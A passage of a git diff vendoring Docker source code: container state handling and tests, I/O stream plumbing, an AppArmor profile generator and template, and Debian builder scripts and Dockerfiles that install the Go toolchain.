s.waitChan + s.Unlock() + select { + case <-waitChan: + s.Lock() + state := newStateStatus(s.ExitCode(), s.Error()) + s.Unlock() + if state.ExitCode() == 0 { + return nil + } + return state + case <-ctx.Done(): + return ctx.Err() + } +} + +// IsRunning returns whether the running flag is set. Used by Container to check whether a container is running. +func (s *State) IsRunning() bool { + s.Lock() + res := s.Running + s.Unlock() + return res +} + +// GetPID holds the process id of a container. +func (s *State) GetPID() int { + s.Lock() + res := s.Pid + s.Unlock() + return res +} + +// ExitCode returns current exitcode for the state. Take lock before if state +// may be shared. +func (s *State) ExitCode() int { + return s.ExitCodeValue +} + +// SetExitCode sets current exitcode for the state. Take lock before if state +// may be shared. +func (s *State) SetExitCode(ec int) { + s.ExitCodeValue = ec +} + +// SetRunning sets the state of the container to "running". +func (s *State) SetRunning(pid int, initial bool) { + s.ErrorMsg = "" + s.Running = true + s.Restarting = false + s.ExitCodeValue = 0 + s.Pid = pid + if initial { + s.StartedAt = time.Now().UTC() + } +} + +// SetStopped sets the container state to "stopped" without locking. +func (s *State) SetStopped(exitStatus *ExitStatus) { + s.Running = false + s.Paused = false + s.Restarting = false + s.Pid = 0 + s.FinishedAt = time.Now().UTC() + s.setFromExitStatus(exitStatus) + close(s.waitChan) // fire waiters for stop + s.waitChan = make(chan struct{}) +} + +// SetRestarting sets the container state to "restarting" without locking. +// It also sets the container PID to 0. +func (s *State) SetRestarting(exitStatus *ExitStatus) { + // we should consider the container running when it is restarting because of + // all the checks in docker around rm/stop/etc + s.Running = true + s.Restarting = true + s.Pid = 0 + s.FinishedAt = time.Now().UTC() + s.setFromExitStatus(exitStatus) + close(s.waitChan) // fire waiters for stop + s.waitChan = make(chan struct{}) +} + +// SetError sets the container's error state. This is useful when we want to +// know the error that occurred when container transits to another state +// when inspecting it +func (s *State) SetError(err error) { + s.ErrorMsg = err.Error() +} + +// IsPaused returns whether the container is paused or not. +func (s *State) IsPaused() bool { + s.Lock() + res := s.Paused + s.Unlock() + return res +} + +// IsRestarting returns whether the container is restarting or not. +func (s *State) IsRestarting() bool { + s.Lock() + res := s.Restarting + s.Unlock() + return res +} + +// SetRemovalInProgress sets the container state as being removed. +// It returns true if the container was already in that state. +func (s *State) SetRemovalInProgress() bool { + s.Lock() + defer s.Unlock() + if s.RemovalInProgress { + return true + } + s.RemovalInProgress = true + return false +} + +// ResetRemovalInProgress makes the RemovalInProgress state to false. +func (s *State) ResetRemovalInProgress() { + s.Lock() + s.RemovalInProgress = false + s.Unlock() +} + +// SetDead sets the container state to "dead" +func (s *State) SetDead() { + s.Lock() + s.Dead = true + s.Unlock() +} + +// Error returns current error for the state. +func (s *State) Error() string { + return s.ErrorMsg +} diff --git a/vendor/github.com/docker/docker/container/state_solaris.go b/vendor/github.com/docker/docker/container/state_solaris.go new file mode 100644 index 0000000000..1229650efa --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_solaris.go @@ -0,0 +1,7 @@ +package container + +// setFromExitStatus is a platform specific helper function to set the state +// based on the ExitStatus structure. +func (s *State) setFromExitStatus(exitStatus *ExitStatus) { + s.ExitCodeValue = exitStatus.ExitCode +} diff --git a/vendor/github.com/docker/docker/container/state_test.go b/vendor/github.com/docker/docker/container/state_test.go new file mode 100644 index 0000000000..c9a7bb4b7b --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_test.go @@ -0,0 +1,113 @@ +package container + +import ( + "sync/atomic" + "testing" + "time" + + "github.com/docker/docker/api/types" +) + +func TestIsValidHealthString(t *testing.T) { + contexts := []struct { + Health string + Expected bool + }{ + {types.Healthy, true}, + {types.Unhealthy, true}, + {types.Starting, true}, + {types.NoHealthcheck, true}, + {"fail", false}, + } + + for _, c := range contexts { + v := IsValidHealthString(c.Health) + if v != c.Expected { + t.Fatalf("Expected %t, but got %t", c.Expected, v) + } + } +} + +func TestStateRunStop(t *testing.T) { + s := NewState() + for i := 1; i < 3; i++ { // full lifecycle two times + s.Lock() + s.SetRunning(i+100, false) + s.Unlock() + + if !s.IsRunning() { + t.Fatal("State not running") + } + if s.Pid != i+100 { + t.Fatalf("Pid %v, expected %v", s.Pid, i+100) + } + if s.ExitCode() != 0 { + t.Fatalf("ExitCode %v, expected 0", s.ExitCode()) + } + + stopped := make(chan struct{}) + var exit int64 + go func() { + exitCode, _ := s.WaitStop(-1 * time.Second) + atomic.StoreInt64(&exit, int64(exitCode)) + close(stopped) + }() + s.Lock() + s.SetStopped(&ExitStatus{ExitCode: i}) + s.Unlock() + if s.IsRunning() { + t.Fatal("State is running") + } + if s.ExitCode() != i { + t.Fatalf("ExitCode %v, expected %v", s.ExitCode(), i) + } + if s.Pid != 0 { + t.Fatalf("Pid %v, expected 0", s.Pid) + } + select { + case <-time.After(100 * time.Millisecond): + t.Fatal("Stop callback doesn't fire in 100 milliseconds") + case <-stopped: + t.Log("Stop callback fired") + } + exitCode := int(atomic.LoadInt64(&exit)) + if exitCode != i { + t.Fatalf("ExitCode %v, expected %v", exitCode, i) + } + if exitCode, err := s.WaitStop(-1 * time.Second); err != nil || exitCode != i { + t.Fatalf("WaitStop returned exitCode: %v, err: %v, expected exitCode: %v, err: %v", exitCode, err, i, nil) + } + } +} + +func TestStateTimeoutWait(t *testing.T) { + s := NewState() + stopped := make(chan struct{}) + go func() { + s.WaitStop(100 * time.Millisecond) + close(stopped) + }() + select { + case <-time.After(200 * time.Millisecond): + t.Fatal("Stop callback doesn't fire in 200 milliseconds") + case <-stopped: + t.Log("Stop callback fired") + } + + s.Lock() + s.SetStopped(&ExitStatus{ExitCode: 1}) + s.Unlock() + + stopped = make(chan struct{}) + go func() { + s.WaitStop(100 * time.Millisecond) + close(stopped) + }() + select { + case <-time.After(200 * time.Millisecond): + t.Fatal("Stop callback doesn't fire in 100 milliseconds") + case <-stopped: + t.Log("Stop callback fired") + } + +} diff --git a/vendor/github.com/docker/docker/container/state_unix.go b/vendor/github.com/docker/docker/container/state_unix.go new file mode 100644 index 0000000000..a2fa5afc28 --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_unix.go @@ -0,0 +1,10 @@ +// +build linux freebsd + +package container + +// setFromExitStatus is a platform specific helper function to set the state +// based on the ExitStatus structure. +func (s *State) setFromExitStatus(exitStatus *ExitStatus) { + s.ExitCodeValue = exitStatus.ExitCode + s.OOMKilled = exitStatus.OOMKilled +} diff --git a/vendor/github.com/docker/docker/container/state_windows.go b/vendor/github.com/docker/docker/container/state_windows.go new file mode 100644 index 0000000000..1229650efa --- /dev/null +++ b/vendor/github.com/docker/docker/container/state_windows.go @@ -0,0 +1,7 @@ +package container + +// setFromExitStatus is a platform specific helper function to set the state +// based on the ExitStatus structure. +func (s *State) setFromExitStatus(exitStatus *ExitStatus) { + s.ExitCodeValue = exitStatus.ExitCode +} diff --git a/vendor/github.com/docker/docker/container/store.go b/vendor/github.com/docker/docker/container/store.go new file mode 100644 index 0000000000..042fb1a349 --- /dev/null +++ b/vendor/github.com/docker/docker/container/store.go @@ -0,0 +1,28 @@ +package container + +// StoreFilter defines a function to filter +// container in the store. +type StoreFilter func(*Container) bool + +// StoreReducer defines a function to +// manipulate containers in the store +type StoreReducer func(*Container) + +// Store defines an interface that +// any container store must implement. +type Store interface { + // Add appends a new container to the store. + Add(string, *Container) + // Get returns a container from the store by the identifier it was stored with. + Get(string) *Container + // Delete removes a container from the store by the identifier it was stored with. + Delete(string) + // List returns a list of containers from the store. + List() []*Container + // Size returns the number of containers in the store. + Size() int + // First returns the first container found in the store by a given filter. + First(StoreFilter) *Container + // ApplyAll calls the reducer function with every container in the store. + ApplyAll(StoreReducer) +} diff --git a/vendor/github.com/docker/docker/container/stream/streams.go b/vendor/github.com/docker/docker/container/stream/streams.go new file mode 100644 index 0000000000..79f366afda --- /dev/null +++ b/vendor/github.com/docker/docker/container/stream/streams.go @@ -0,0 +1,143 @@ +package stream + +import ( + "fmt" + "io" + "io/ioutil" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/broadcaster" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/pools" +) + +// Config holds information about I/O streams managed together. +// +// config.StdinPipe returns a WriteCloser which can be used to feed data +// to the standard input of the streamConfig's active process. +// config.StdoutPipe and streamConfig.StderrPipe each return a ReadCloser +// which can be used to retrieve the standard output (and error) generated +// by the container's active process. The output (and error) are actually +// copied and delivered to all StdoutPipe and StderrPipe consumers, using +// a kind of "broadcaster". +type Config struct { + sync.WaitGroup + stdout *broadcaster.Unbuffered + stderr *broadcaster.Unbuffered + stdin io.ReadCloser + stdinPipe io.WriteCloser +} + +// NewConfig creates a stream config and initializes +// the standard err and standard out to new unbuffered broadcasters. +func NewConfig() *Config { + return &Config{ + stderr: new(broadcaster.Unbuffered), + stdout: new(broadcaster.Unbuffered), + } +} + +// Stdout returns the standard output in the configuration. +func (c *Config) Stdout() *broadcaster.Unbuffered { + return c.stdout +} + +// Stderr returns the standard error in the configuration. +func (c *Config) Stderr() *broadcaster.Unbuffered { + return c.stderr +} + +// Stdin returns the standard input in the configuration. +func (c *Config) Stdin() io.ReadCloser { + return c.stdin +} + +// StdinPipe returns an input writer pipe as an io.WriteCloser. +func (c *Config) StdinPipe() io.WriteCloser { + return c.stdinPipe +} + +// StdoutPipe creates a new io.ReadCloser with an empty bytes pipe. +// It adds this new out pipe to the Stdout broadcaster. +func (c *Config) StdoutPipe() io.ReadCloser { + bytesPipe := ioutils.NewBytesPipe() + c.stdout.Add(bytesPipe) + return bytesPipe +} + +// StderrPipe creates a new io.ReadCloser with an empty bytes pipe. +// It adds this new err pipe to the Stderr broadcaster. +func (c *Config) StderrPipe() io.ReadCloser { + bytesPipe := ioutils.NewBytesPipe() + c.stderr.Add(bytesPipe) + return bytesPipe +} + +// NewInputPipes creates new pipes for both standard inputs, Stdin and StdinPipe. +func (c *Config) NewInputPipes() { + c.stdin, c.stdinPipe = io.Pipe() +} + +// NewNopInputPipe creates a new input pipe that will silently drop all messages in the input. +func (c *Config) NewNopInputPipe() { + c.stdinPipe = ioutils.NopWriteCloser(ioutil.Discard) +} + +// CloseStreams ensures that the configured streams are properly closed. +func (c *Config) CloseStreams() error { + var errors []string + + if c.stdin != nil { + if err := c.stdin.Close(); err != nil { + errors = append(errors, fmt.Sprintf("error close stdin: %s", err)) + } + } + + if err := c.stdout.Clean(); err != nil { + errors = append(errors, fmt.Sprintf("error close stdout: %s", err)) + } + + if err := c.stderr.Clean(); err != nil { + errors = append(errors, fmt.Sprintf("error close stderr: %s", err)) + } + + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + + return nil +} + +// CopyToPipe connects streamconfig with a libcontainerd.IOPipe +func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) { + copyFunc := func(w io.Writer, r io.Reader) { + c.Add(1) + go func() { + if _, err := pools.Copy(w, r); err != nil { + logrus.Errorf("stream copy error: %+v", err) + } + c.Done() + }() + } + + if iop.Stdout != nil { + copyFunc(c.Stdout(), iop.Stdout) + } + if iop.Stderr != nil { + copyFunc(c.Stderr(), iop.Stderr) + } + + if stdin := c.Stdin(); stdin != nil { + if iop.Stdin != nil { + go func() { + pools.Copy(iop.Stdin, stdin) + if err := iop.Stdin.Close(); err != nil { + logrus.Warnf("failed to close stdin: %+v", err) + } + }() + } + } +} diff --git a/vendor/github.com/docker/docker/contrib/README.md b/vendor/github.com/docker/docker/contrib/README.md new file mode 100644 index 0000000000..92b1d94433 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/README.md @@ -0,0 +1,4 @@ +The `contrib` directory contains scripts, images, and other helpful things +which are not part of the core docker distribution. Please note that they +could be out of date, since they do not receive the same attention as the +rest of the repository. diff --git a/vendor/github.com/docker/docker/contrib/REVIEWERS b/vendor/github.com/docker/docker/contrib/REVIEWERS new file mode 100644 index 0000000000..18e05a3070 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/REVIEWERS @@ -0,0 +1 @@ +Tianon Gravi (@tianon) diff --git a/vendor/github.com/docker/docker/contrib/apparmor/main.go b/vendor/github.com/docker/docker/contrib/apparmor/main.go new file mode 100644 index 0000000000..f4a2978b86 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/apparmor/main.go @@ -0,0 +1,56 @@ +package main + +import ( + "fmt" + "log" + "os" + "path" + "text/template" + + "github.com/docker/docker/pkg/aaparser" +) + +type profileData struct { + Version int +} + +func main() { + if len(os.Args) < 2 { + log.Fatal("pass a filename to save the profile in.") + } + + // parse the arg + apparmorProfilePath := os.Args[1] + + version, err := aaparser.GetVersion() + if err != nil { + log.Fatal(err) + } + data := profileData{ + Version: version, + } + fmt.Printf("apparmor_parser is of version %+v\n", data) + + // parse the template + compiled, err := template.New("apparmor_profile").Parse(dockerProfileTemplate) + if err != nil { + log.Fatalf("parsing template failed: %v", err) + } + + // make sure /etc/apparmor.d exists + if err := os.MkdirAll(path.Dir(apparmorProfilePath), 0755); err != nil { + log.Fatal(err) + } + + f, err := os.OpenFile(apparmorProfilePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644) + if err != nil { + log.Fatal(err) + } + defer f.Close() + + if err := compiled.Execute(f, data); err != nil { + log.Fatalf("executing template failed: %v", err) + } + + fmt.Printf("created apparmor profile for version %+v at %q\n", data, apparmorProfilePath) +} diff --git a/vendor/github.com/docker/docker/contrib/apparmor/template.go b/vendor/github.com/docker/docker/contrib/apparmor/template.go new file mode 100644 index 0000000000..e5e1c8bed6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/apparmor/template.go @@ -0,0 +1,268 @@ +package main + +const dockerProfileTemplate = `@{DOCKER_GRAPH_PATH}=/var/lib/docker + +profile /usr/bin/docker (attach_disconnected, complain) { + # Prevent following links to these files during container setup. + deny /etc/** mkl, + deny /dev/** kl, + deny /sys/** mkl, + deny /proc/** mkl, + + mount -> @{DOCKER_GRAPH_PATH}/**, + mount -> /, + mount -> /proc/**, + mount -> /sys/**, + mount -> /run/docker/netns/**, + mount -> /.pivot_root[0-9]*/, + + / r, + + umount, + pivot_root, +{{if ge .Version 209000}} + signal (receive) peer=@{profile_name}, + signal (receive) peer=unconfined, + signal (send), +{{end}} + network, + capability, + owner /** rw, + @{DOCKER_GRAPH_PATH}/** rwl, + @{DOCKER_GRAPH_PATH}/linkgraph.db k, + @{DOCKER_GRAPH_PATH}/network/files/boltdb.db k, + @{DOCKER_GRAPH_PATH}/network/files/local-kv.db k, + @{DOCKER_GRAPH_PATH}/[0-9]*.[0-9]*/linkgraph.db k, + + # For non-root client use: + /dev/urandom r, + /dev/null rw, + /dev/pts/[0-9]* rw, + /run/docker.sock rw, + /proc/** r, + /proc/[0-9]*/attr/exec w, + /sys/kernel/mm/hugepages/ r, + /etc/localtime r, + /etc/ld.so.cache r, + /etc/passwd r, + +{{if ge .Version 209000}} + ptrace peer=@{profile_name}, + ptrace (read) peer=docker-default, + deny ptrace (trace) peer=docker-default, + deny ptrace peer=/usr/bin/docker///bin/ps, +{{end}} + + /usr/lib/** rm, + /lib/** rm, + + /usr/bin/docker pix, + /sbin/xtables-multi rCx, + /sbin/iptables rCx, + /sbin/modprobe rCx, + /sbin/auplink rCx, + /sbin/mke2fs rCx, + /sbin/tune2fs rCx, + /sbin/blkid rCx, + /bin/kmod rCx, + /usr/bin/xz rCx, + /bin/ps rCx, + /bin/tar rCx, + /bin/cat rCx, + /sbin/zfs rCx, + /sbin/apparmor_parser rCx, + +{{if ge .Version 209000}} + # Transitions + change_profile -> docker-*, + change_profile -> unconfined, +{{end}} + + profile /bin/cat (complain) { + /etc/ld.so.cache r, + /lib/** rm, + /dev/null rw, + /proc r, + /bin/cat mr, + + # For reading in 'docker stats': + /proc/[0-9]*/net/dev r, + } + profile /bin/ps (complain) { + /etc/ld.so.cache r, + /etc/localtime r, + /etc/passwd r, + /etc/nsswitch.conf r, + /lib/** rm, + /proc/[0-9]*/** r, + /dev/null rw, + /bin/ps mr, + +{{if ge .Version 209000}} + # We don't need ptrace so we'll deny and ignore the error. + deny ptrace (read, trace), +{{end}} + + # Quiet dac_override denials + deny capability dac_override, + deny capability dac_read_search, + deny capability sys_ptrace, + + /dev/tty r, + /proc/stat r, + /proc/cpuinfo r, + /proc/meminfo r, + /proc/uptime r, + /sys/devices/system/cpu/online r, + /proc/sys/kernel/pid_max r, + /proc/ r, + /proc/tty/drivers r, + } + profile /sbin/iptables (complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + capability net_admin, + } + profile /sbin/auplink flags=(attach_disconnected, complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + capability sys_admin, + capability dac_override, + + @{DOCKER_GRAPH_PATH}/aufs/** rw, + @{DOCKER_GRAPH_PATH}/tmp/** rw, + # For user namespaces: + @{DOCKER_GRAPH_PATH}/[0-9]*.[0-9]*/** rw, + + /sys/fs/aufs/** r, + /lib/** rm, + /apparmor/.null r, + /dev/null rw, + /etc/ld.so.cache r, + /sbin/auplink rm, + /proc/fs/aufs/** rw, + /proc/[0-9]*/mounts rw, + } + profile /sbin/modprobe /bin/kmod (complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + capability sys_module, + /etc/ld.so.cache r, + /lib/** rm, + /dev/null rw, + /apparmor/.null rw, + /sbin/modprobe rm, + /bin/kmod rm, + /proc/cmdline r, + /sys/module/** r, + /etc/modprobe.d{/,/**} r, + } + # xz works via pipes, so we do not need access to the filesystem. + profile /usr/bin/xz (complain) { +{{if ge .Version 209000}} + signal (receive) peer=/usr/bin/docker, +{{end}} + /etc/ld.so.cache r, + /lib/** rm, + /usr/bin/xz rm, + deny /proc/** rw, + deny /sys/** rw, + } + profile /sbin/xtables-multi (attach_disconnected, complain) { + /etc/ld.so.cache r, + /lib/** rm, + /sbin/xtables-multi rm, + /apparmor/.null w, + /dev/null rw, + + /proc r, + + capability net_raw, + capability net_admin, + network raw, + } + profile /sbin/zfs (attach_disconnected, complain) { + file, + capability, + } + profile /sbin/mke2fs (complain) { + /sbin/mke2fs rm, + + /lib/** rm, + + /apparmor/.null w, + + /etc/ld.so.cache r, + /etc/mke2fs.conf r, + /etc/mtab r, + + /dev/dm-* rw, + /dev/urandom r, + /dev/null rw, + + /proc/swaps r, + /proc/[0-9]*/mounts r, + } + profile /sbin/tune2fs (complain) { + /sbin/tune2fs rm, + + /lib/** rm, + + /apparmor/.null w, + + /etc/blkid.conf r, + /etc/mtab r, + /etc/ld.so.cache r, + + /dev/null rw, + /dev/.blkid.tab r, + /dev/dm-* rw, + + /proc/swaps r, + /proc/[0-9]*/mounts r, + } + profile /sbin/blkid (complain) { + /sbin/blkid rm, + + /lib/** rm, + /apparmor/.null w, + + /etc/ld.so.cache r, + /etc/blkid.conf r, + + /dev/null rw, + /dev/.blkid.tab rl, + /dev/.blkid.tab* rwl, + /dev/dm-* r, + + /sys/devices/virtual/block/** r, + + capability mknod, + + mount -> @{DOCKER_GRAPH_PATH}/**, + } + profile /sbin/apparmor_parser (complain) { + /sbin/apparmor_parser rm, + + /lib/** rm, + + /etc/ld.so.cache r, + /etc/apparmor/** r, + /etc/apparmor.d/** r, + /etc/apparmor.d/cache/** w, + + /dev/null rw, + + /sys/kernel/security/apparmor/** r, + /sys/kernel/security/apparmor/.replace w, + + /proc/[0-9]*/mounts r, + /proc/sys/kernel/osrelease r, + /proc r, + + capability mac_admin, + } +}` diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh new file mode 100755 index 0000000000..8271d9dc47 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh new file mode 100755 index 0000000000..b5040b709a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh @@ -0,0 +1,118 @@ +#!/bin/bash +set -e + +# This file is used to auto-generate Dockerfiles for making debs via 'make deb' +# +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh ubuntu-trusty +# to only update ubuntu-trusty/Dockerfile +# or: ./generate.sh ubuntu-newversion +# to create a new folder and a Dockerfile within it +# +# Note: non-LTS versions are not guaranteed to work. + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + echo "${versions[@]}" + distro="${version%-*}" + suite="${version##*-}" + from="aarch64/${distro}:${suite}" + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! + # + + FROM $from + + EOF + + dockerBuildTags='apparmor pkcs11 selinux' + runcBuildTags='apparmor selinux' + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + + case "$suite" in + trusty) + packages+=( libsystemd-journal-dev ) + # aarch64 doesn't have an official downloadable binary for go. + # And gccgo for trusty only includes Go 1.2 implementation which + # is too old to build current go source, fortunately trusty has + # golang-1.6-go package can be used as bootstrap. + packages+=( golang-1.6-go ) + ;; + xenial) + packages+=( libsystemd-dev ) + packages+=( golang-go libseccomp-dev) + + dockerBuildTags="$dockerBuildTags seccomp" + runcBuildTags="$runcBuildTags seccomp" + ;; + *) + echo "Unsupported distro:" $distro:$suite + rm -fr "$version" + exit 1 + ;; + esac + + # update and install packages + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + case "$suite" in + trusty) + echo 'RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + ;; + *) + ;; + esac + + echo "# Install Go" >> "$version/Dockerfile" + echo "# aarch64 doesn't have official go binaries, so use the version of go installed from" >> "$version/Dockerfile" + echo "# the image to build go from source." >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.aarch64 >> "$version/Dockerfile" + echo 'RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \' >> "$version/Dockerfile" + echo ' && cd /usr/src/go/src \' >> "$version/Dockerfile" + echo ' && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo 'ENV PATH $PATH:/usr/src/go/bin' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo "ENV AUTO_GOPATH 1" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo "ENV DOCKER_BUILDTAGS $dockerBuildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..d04860ccd7 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile @@ -0,0 +1,24 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! +# + +FROM aarch64/ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev golang-1.6-go --no-install-recommends && rm -rf /var/lib/apt/lists/* + +RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100 + +# Install Go +# aarch64 doesn't have official go binaries, so use the version of go installed from +# the image to build go from source. +ENV GO_VERSION 1.7.5 +RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ + && cd /usr/src/go/src \ + && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash + +ENV PATH $PATH:/usr/src/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..3cd8442eca --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile @@ -0,0 +1,22 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! +# + +FROM aarch64/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-dev golang-go libseccomp-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +# Install Go +# aarch64 doesn't have official go binaries, so use the version of go installed from +# the image to build go from source. +ENV GO_VERSION 1.7.5 +RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ + && cd /usr/src/go/src \ + && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash + +ENV PATH $PATH:/usr/src/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux seccomp +ENV RUNC_BUILDTAGS apparmor selinux seccomp diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md new file mode 100644 index 0000000000..20a0ff1006 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md @@ -0,0 +1,5 @@ +# `dockercore/builder-deb` + +This image's tags contain the dependencies for building Docker `.deb`s for each of the Debian-based platforms Docker targets. + +To add new tags, see [`contrib/builder/deb/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/deb/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh new file mode 100755 index 0000000000..8271d9dc47 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile new file mode 100644 index 0000000000..42aaa56c01 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile @@ -0,0 +1,20 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile new file mode 100644 index 0000000000..c052be56ce --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile @@ -0,0 +1,20 @@ 